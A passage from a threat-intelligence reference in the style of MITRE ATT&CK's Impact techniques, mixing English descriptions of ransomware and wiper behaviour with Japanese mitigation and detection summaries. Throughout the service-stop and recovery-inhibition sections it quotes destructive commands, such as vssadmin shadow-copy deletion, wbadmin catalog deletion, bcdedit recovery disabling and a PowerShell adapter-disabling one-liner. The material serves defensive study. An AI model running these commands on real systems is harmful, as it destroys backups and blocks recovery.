backups, security, databases, communication, filesharing and websites. Olympic Destroyer uses the API call <code>ChangeServiceConfigW</code> to disable all services on the affected system. WannaCry attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores. RobbinHood stops 181 Windows services on the system before beginning the encryption process. HotCroissant has the ability to stop services on the infected host. Ryuk has called <code>kill.bat</code> for stopping services, disabling services and killing processes. Maze has stopped SQL services to ensure it can encrypt any database. Netwalker can terminate system processes and services, some of which relate to backup software. Ragnar Locker has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted. REvil has the capability to stop services and kill processes. SLOTHFULMEDIA has the capability to stop processes and services. Pay2Key can stop the MS SQL service at the end of the encryption process to release files locked by the service. Conti can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of <code>net stop</code>. MegaCortex can stop and disable services on the system. LookBack can kill processes and delete services. Pysa can stop services and processes. Industroyer’s data wiper module writes zeros into the registry keys in <code>SYSTEM\CurrentControlSet\Services</code> to render a system inoperable. EKANS stops database, data backup solution, antivirus, and ICS-related processes. KillDisk terminates various processes to get the user to reboot the victim machine. Clop can kill several processes and services related to backups and security solutions. Cuba has a hardcoded list of services and processes to terminate. Babuk can stop specific services related to backups. Avaddon looks for and attempts to stop database processes. Diavol will terminate services using the Service Control Manager (SCM) API. Meteor can disconnect all network adapters on a compromised host using `powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }" > NUL`. HermeticWiper has the ability to stop the Volume Shadow Copy service. AvosLocker has terminated specific processes before encryption. Prestige has attempted to stop the MSSQL Windows service to ensure successful encryption using `C:\Windows\System32\net.exe stop MSSQLSERVER`. BlackCat has the ability to stop VM services on compromised networks. Royal can use `RmShutDown` to kill applications and services using the resources that are targeted for encryption. Cheerscrypt has the ability to terminate VM processes on compromised hosts through execution of `esxcli vm process kill`. INC Ransomware can issue a command to kill a process on compromised hosts. ROADSWEEP can disable critical services and processes. BlackByte 2.0 Ransomware can terminate running services. Megazord has the ability to terminate a list of services and processes. Akira _v2 can stop running virtual machines. LockBit 2.0 can automatically terminate processes that may interfere with the encryption or file extraction processes. LockBit 3.0 can terminate targeted processes and services related to security, backup, database management, and other applications that could stop or interfere with encryption. Hannotog can stop Windows services. RansomHub has the ability to terminate specified services. VIRTUALPITA can start and stop the `vmsyslogd` service. Qilin can terminate specific services on compromised hosts. Medusa Ransomware has the capability to terminate services related to backups, security, databases, communication, filesharing and websites. Medusa Ransomware has also utilized the `taskkill /F /IM <process> /T` command to stop targeted processes and `net stop <process>` command to stop designated services. InvisibleFerret has terminated Chrome and Brave browsers using the `taskkill` command on Windows and the `killall` command on other systems such as Linux and macOS. InvisibleFerret has also utilized it’s `ssh_kill` command to terminate Chrome and Brave browser processes. Embargo has terminated active processes and services based on a hardcoded list using the `CloseServiceHandle()` function. Embargo has also leveraged MS4Killer to terminate processes contained in an embedded list of security software process names that were XOR-encrypted. DRYHOOK has terminated all instances of the `cgi-server` process before activating the modified DSAuth.pm file. PHASEJAM has disabled the `cgi-server` process on Ivanti Connect Secure appliances. BRICKSTORM has terminated an existing process to ensure that its own new process can execute. 敵対者は、シャドウコピー削除等によりシステム復旧を妨害することがある。 Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. This may deny access to available backups and recovery options. アカウントの作成・権限・ライフサイクルを適切に管理する。 OSを安全に構成し、攻撃対象領域を縮小する。 許可されていないコードの実行を防止する。 データを定期的にバックアップし、破壊・暗号化からの復旧を可能にする。 システム復旧の阻害に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2025 Poland Wiper Attacks, the adversaries deleted Windows Volume Shadow Copies using `vssadmin delete shadows`. Sandworm Team uses Prestige to delete the backup catalog from the target system using: `C:\Windows\System32\wbadmin.exe delete catalog -quiet` and to delete volume shadow copies using: `C:\Windows\System32\vssadmin.exe delete shadows /all /quiet`. Wizard Spider has used WMIC and vssadmin to manually delete volume shadow copies. Wizard Spider has also used Conti ransomware to delete volume shadow copies automatically with the use of vssadmin. Scattered Spider has stopped the Volume Shadow Copy service on compromised hosts. BlackByte resized and deleted volume shadow copy files to prevent system recovery after encryption. Medusa Group has deleted recovery files such as shadow copies using `vssadmin.exe`. Storm-0501 has deleted snapshots, restore points, storage accounts, and backup services to prevent remediation and restoration. Storm-0501 has also impacted Azure resources through the targeting of `Microsoft.Compute/snapshots/delete`, `Microsoft.Compute/restorePointCollections/delete`, `Microsoft.Storage/storageAccounts/delete`, and `Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/delete`. VOID MANTICORE has deleted virtual machines directly from the virtualization platform. H1N1 disable recovery options and deletes shadow copies from the victim. InvisiMole can can remove all system restore points. Olympic Destroyer uses the native Windows utilities <code>vssadmin</code>, <code>wbadmin</code>, and <code>bcdedit</code> to delete and disable operating system recovery features such as the Windows backup catalog and Windows Automatic Repair. WannaCry uses <code>vssadmin</code>, <code>wbadmin</code>, <code>bcdedit</code>, and <code>wmic</code> to delete and disable operating system recovery features. JCry has been observed deleting shadow copies to ensure that data cannot be restored easily. RobbinHood deletes shadow copies to ensure that all the data cannot be restored easily. Ryuk has used <code>vssadmin Delete Shadows /all /quiet</code> to to delete volume shadow copies and <code>vssadmin resize shadowstorage</code> to force deletion of shadow copies created by third-party applications. Maze has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process. Netwalker can delete the infected system's Shadow Volumes to prevent recovery. Ragnar Locker can delete volume shadow copies using <code>vssadmin delete shadows /all /quiet</code>. REvil can use vssadmin to delete volume shadow copies and bcdedit to disable recovery features. BitPaymer attempts to remove the backup shadow files from the host using <code>vssadmin.exe Delete Shadows /All /Quiet</code>. Conti can delete Windows Volume Shadow Copies using <code>vssadmin</code>. MegaCortex has deleted volume shadow copies using <code>vssadmin.exe</code>. Pysa has the functionality to delete shadow copies. EKANS removes backups of Volume Shadow Copies to disable any restoration capabilities. Conficker resets system restore points and deletes backup files. Clop can delete the shadow volumes with <code>vssadmin Delete Shadows /all /quiet</code> and can use bcdedit to disable recovery options. WastedLocker can delete shadow volumes. DEATHRANSOM can delete volume shadow copies on compromised hosts. HELLOKITTY can delete volume shadow copies on compromised hosts. FIVEHANDS has the ability to delete volume shadow copies on compromised hosts. Babuk has the ability to delete shadow volumes using <code>vssadmin.exe delete shadows /all /quiet</code>. Avaddon deletes backups and shadow copies using native system tools. ProLock can use vssadmin.exe to remove volume shadow copies. Diavol can delete shadow copies using the `IVssBackupComponents` COM object to call the `DeleteSnapshots` method. DarkWatchman can delete shadow volumes using <code>vssadmin.exe</code>. Meteor can use `bcdedit` to delete different boot identifiers on a compromised host; it can also use `vssadmin.exe delete shadows /all /quiet` and `C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete`. HermeticWiper can disable the VSS service on a compromised host using the service control manager. Prestige can delete the backup catalog from the target system using: `c:\Windows\System32\wbadmin.exe delete catalog -quiet` and can also delete volume shadow copies using: `\Windows\System32\vssadmin.exe delete shadows /all /quiet`. BlackCat can delete shadow copies using `vssadmin.exe delete shadows /all /quiet` and `wmic.exe Shadowcopy Delete`; it can also modify the boot loader using `bcdedit /set {default} recoveryenabled No`. Black Basta can delete shadow copies using vssadmin.exe. Royal can delete shadow copy backups with vssadmin.exe using the command `delete shadows /all /quiet`. DarkGate can delete system restore points through the command <code>cmd.exe /c vssadmin delete shadows /for=c: /all /quiet”</code>. Akira will delete system volume shadow copies via PowerShell commands. MultiLayer Wiper wipes the boot sector of infected systems to inhibit system recovery. BFG Agonizer wipes the boot sector of infected machines to inhibit system recovery. INC Ransomware can delete volume shadow copy backups from victim machines. ROADSWEEP has the ability to disable `SystemRestore` and Volume Shadow Copies. Playcrypt can use AlphaVSS to delete shadow copies. BlackByte Ransomware deletes all volume shadow copies and restore points among other actions to inhibit system recovery following ransomware deployment. BlackByte 2.0 Ransomware modifies volume shadow copies during execution in a way that destroys them on the victim machine. LockBit 2.0 has the ability to delete volume shadow copies on targeted hosts. LockBit 3.0 can delete volume shadow copies. RansomHub has used `vssadmin.exe` to delete volume shadow copies. Qilin can execute `vssadmin.exe delete shadows /all /quiet` to remove volume shadow copies and can disable High Availability (HA) and Distributed Resource Scheduler (DRS) in vCenter clusters. Medusa Ransomware has deleted recovery files such as shadow copies using `vssadmin.exe`. Embargo has cleared files from the recycle bin by invoking `SHEmptyRecycleBinW()` and disabled Windows recovery through `C:\Windows\System32\cmd.exe /q /c bcdedit /set {default} recoveryenabled no`. 敵対者は、Webサイトやシステムの表示内容を改ざんすることがある。 Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. 敵対者は、内部向けシステムの表示を改ざんすることがある。An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites or server login messages, or directly to user systems with the replacement of the desktop wallpaper. Disturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished. 敵対者は、外部公開Webサイト等の表示を改ざんすることがある。An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. External Defacement may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda. External Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as Drive-by Compromise. データを定期的にバックアップし、破壊・暗号化からの復旧を可能にする。 改ざん（デフェイスメント）に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、システムのファームウェアを破壊して機器を使用不能にすることがある。 Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system. Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ブートの完全性を検証し、起動段階での改ざんを防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 ファームウェア破壊に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2025 Poland Wiper Attacks, adversaries performed a factory-reset on compromised devices that hampered forensic investigations. TrickBot module "Trickboot" can write or erase the UEFI/BIOS firmware of a compromised device. Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up. 敵対者は、侵害したリソース（計算・帯域等）を不正利用することがある（暗号資産マイニング等）。 Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 敵対者は、侵害した計算リソースを不正利用することがある（マイニング等）。Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 敵対者は、侵害したネットワーク帯域を不正利用することがある。Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 敵対者は、SMS送信機能を悪用して不正利益を得ることがある。Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability. SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider. 敵対者は、侵害したクラウドサービスを不正利用することがある。Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability. リソース乗っ取りに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、ネットワーク帯域を枯渇させてサービスの可用性を妨害することがある。 Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion. 敵対者は、大量トラフィックを直接送りつけて帯域を枯渇させることがある。Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. Direct Network Floods are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. 敵対者は、リフレクション増幅攻撃でトラフィックを増幅させDoSを行うことがある。Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target. This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network. ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 ネットワークDoSに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 In 2016, APT28 conducted a distributed denial of service (DDoS) attack against the World Anti-Doping Agency. Lucifer can execute TCP, UDP, and HTTP denial of service (DoS) attacks. NKAbuse enables multiple types of network denial of service capabilities across several protocols post-installation. 敵対者は、エンドポイントのリソースを枯渇させて可用性を妨害することがある。 Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion. 敵対者は、OSリソースを枯渇させてDoSを行うことがある。Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes. 敵対者は、特定サービスのリソースを枯渇させてDoSを行うことがある。Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well. Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. 敵対者は、アプリのリソースを枯渇させてDoSを行うことがある。Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. 敵対者は、脆弱性を悪用してアプリ/システムをDoS状態にすることがある。Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition. ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 エンドポイントDoSに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Sandworm Team temporarily disrupted service to Georgian government, non-government, and private sector websites after compromising a Georgian web hosting provider in 2019. OnionDuke has the capability to use a Denial of Service module. ZxShell has a feature to perform SYN flood attack on a host. 敵対者は、システムをシャットダウンまたは再起動して可用性を妨害することがある。 Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. <code>reload</code>). They may also include shutdown/reboot of a virtual machine via hypervisor / cloud consoles or command line tools. システムのシャットダウン/再起動に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2025 Poland Wiper Attacks, the adversaries forced victim devices to reboot to finalize destruction of impacted systems. Lazarus Group has rebooted systems after destroying files and wiping the MBR on infected systems. APT37 has used malware that will issue the command <code>shutdown /r /t 1</code> to reboot a system after wiping its MBR. APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR. Medusa Group has manually turned off and encrypted virtual machines. Shamoon will reboot the infected system once the wiping functionality has been completed. Remcos can shutdown and restart remote devices. Olympic Destroyer will shut down the compromised system after it is done modifying system configuration settings. NotPetya will reboot the system one hour after infection. LockerGoga has been observed shutting down infected systems. Maze has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM. LookBack can shutdown and reboot the victim machine. KillDisk attempts to reboot the machine by terminating specific processes. WhisperGate can shutdown a compromised host through execution of `ExitWindowsEx` with the `EXW_SHUTDOWN` flag. HermeticWiper can initiate a system shutdown. DCSrv has a function to sleep for two hours before rebooting the system. AvosLocker’s Linux variant has terminated ESXi virtual machines. Black Basta has used `ShellExecuteA` to shut down and restart the victim system. DarkGate has used the `shutdown`command to shut down and/or restart the victim system. AcidRain reboots the target system once the various wiping processes are complete. Apostle reboots the victim machine following wiping and related activity. MultiLayer Wiper reboots the infected system following wiping and related tasks to prevent system recovery. BFG Agonizer uses elevated privileges to call <code>NtRaiseHardError</code> to induce a "blue screen of death" on infected systems, causing a system crash. Once shut down, the system is no longer bootable. CHIMNEYSWEEP can reboot or shutdown the targeted system or logoff the current user. Latrodectus has the ability to restart compromised hosts. AcidPour includes functionality to reboot the victim system following wiping actions, similar to AcidRain. ShrinkLocker can restart the victim system if it encounters an error during execution, and will forcibly shutdown the system following encryption to lock out victim users. XLoader can initiate a system reboot or shutdown. Qilin can initiate a reboot of the backup server to hinder recovery. DynoWiper has used the Microsoft Windows native `ExitWindowsEx()` function to log off the interactive user and shutdown the system. 敵対者は、正規ユーザーのアカウントアクセスを剥奪して可用性を妨害することがある。 Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials, revoked permissions for SaaS platforms such as Sharepoint) to remove access to accounts. Adversaries may also subsequently log off and/or perform a System Shutdown/Reboot to set malicious changes into place. アカウントアクセスの剥奪に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 LAPSUS$ has removed a targeted organization's global admin accounts to lock the organization out of all access. Akira deletes administrator accounts in victim networks prior to encryption. LockerGoga has been observed changing account passwords and logging off current users. MegaCortex has changed user account passwords and logged users off the system. Meteor has the ability to change the password of local users on compromised hosts and can log off users. DEADWOOD changes the password for local and domain users via <code>net.exe</code> to a random 32 character string to prevent these accounts from logging on. Additionally, DEADWOOD will terminate the <code>winlogon.exe</code> process to prevent attempts to log on to the infected system. 敵対者は、ディスクの内容や構造を消去してシステムを使用不能にすることがある。 Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted. 敵対者は、ディスク上のデータ内容を消去することがある。Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources. 敵対者は、MBR等のディスク構造を消去して起動不能にすることがある。Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. データを定期的にバックアップし、破壊・暗号化からの復旧を可能にする。 ディスクワイプに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、保存・転送・実行時のデータを改ざんして完全性を損なうことがある。 Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. 敵対者は、保存されたデータを改ざんすることがある。Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. 敵対者は、転送中のデータを改ざんすることがある。Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. 敵対者は、実行時に表示・処理されるデータを改ざんすることがある。Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data. By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 重要データをリモートに保管し、破壊・改ざんの影響を軽減する。 ネットワークを分割し、横展開や影響範囲を限定する。 機微情報を暗号化し、窃取時の影響を軽減する。 データ操作に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 FIN13 has injected fraudulent transactions into compromised networks that mimic legitimate behavior to siphon off incremental amounts of money. PHASEJAM has blocked legitimate upgrades of Ivanti Connect Secure systems and falsely indicates a successful upgrade while operating on an older version. 敵対者は、不正送金や詐欺により金銭を窃取することがある。 Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware, business email compromise (BEC) and fraud, "pig butchering," bank hacking, and exploiting cryptocurrency networks. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 金銭窃盗に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During SharePoint ToolShell Exploitation, threat actors demanded ransom payments to unencrypt filesystems and to refrain from publishing sensitive data exfiltrated from victim networks. SilverTerrier targets organizations in high technology, higher education, and manufacturing for business email compromise (BEC) campaigns with the goal of financial theft. Kimsuky has stolen and laundered cryptocurrency to self-fund operations including the acquisition of infrastructure. Scattered Spider has deployed ransomware on compromised hosts and threatened to leak stolen data for financial gain. FIN13 has observed the victim's software and infrastructure over several months to understand the technical process of legitimate financial transactions, prior to attempting to conduct fraudulent transactions. Cinnamon Tempest has maintained leak sites for exfiltrated data in attempt to extort victims into paying a ransom. Akira engages in double-extortion ransomware, exfiltrating files then encrypting them, in order to prompt victims to pay a ransom. Malteiro targets organizations in a wide variety of sectors via the use of Mispadu banking trojan with the goal of financial theft. INC Ransom has stolen and encrypted victim's data in order to extort payment for keeping it private or decrypting it. Play demands ransom payments from victims to unencrypt filesystems and to not publish sensitive data exfiltrated from victim networks. AppleJeus has targeted the cryptocurrency industry with the goal of stealing digital assets. Water Galura has extorted victims for ransomware decryption keys and to prevent publication of data exfiltrated to their Tor data leak site. Medusa Group has stolen and encrypted victims' data in order to extort victims into paying a ransom. Contagious Interview has stolen cryptocurrency wallet credentials and credit card information utilizing BeaverTail and InvisibleFerret malware. Storm-0501 has engaged in double-extortion ransomware, exfiltrating data and directly contacting victims when the primary organization refuses to pay along with posting data on their data leak sites. VOID MANTICORE has conducted data exfiltration and posted stolen information on data leak sites for the purposes of financial and political extortion. VOID MANTICORE has also sold stolen data to prospective buyers for cryptocurrency. DarkGate can deploy payloads capable of capturing credentials related to cryptocurrency wallets. RedLine Stealer has collected data from cryptocurrency wallets and harvested credit cards details from browsers. InvisibleFerret has searched the victim device credentials and files commonly associated with cryptocurrency wallets. BeaverTail has searched the victim device for browser extensions commonly associated with cryptocurrency wallets. Embargo has been leveraged in double-extortion ransomware, exfiltrating files then encrypting them, to prompt victims to pay a ransom. Crocodilus has stolen cryptocurrency wallet details from victim devices. GlassWorm has the ability to steal credentials for cryptocurrency wallets. 敵対者は、大量のメールを送りつけて受信箱を麻痺させ、他の攻撃を隠蔽することがある。 Adversaries may flood targeted email addresses with an overwhelming volume of messages. This may bury legitimate emails in a flood of spam and disrupt business operations. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 ソフトウェアを安全に構成し、悪用を防ぐ。 メール爆撃に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Storm-1811 has deployed large volumes of non-malicious email spam to victims in order to prompt follow-on interactions with the threat actor posing as IT support or helpdesk to resolve the problem.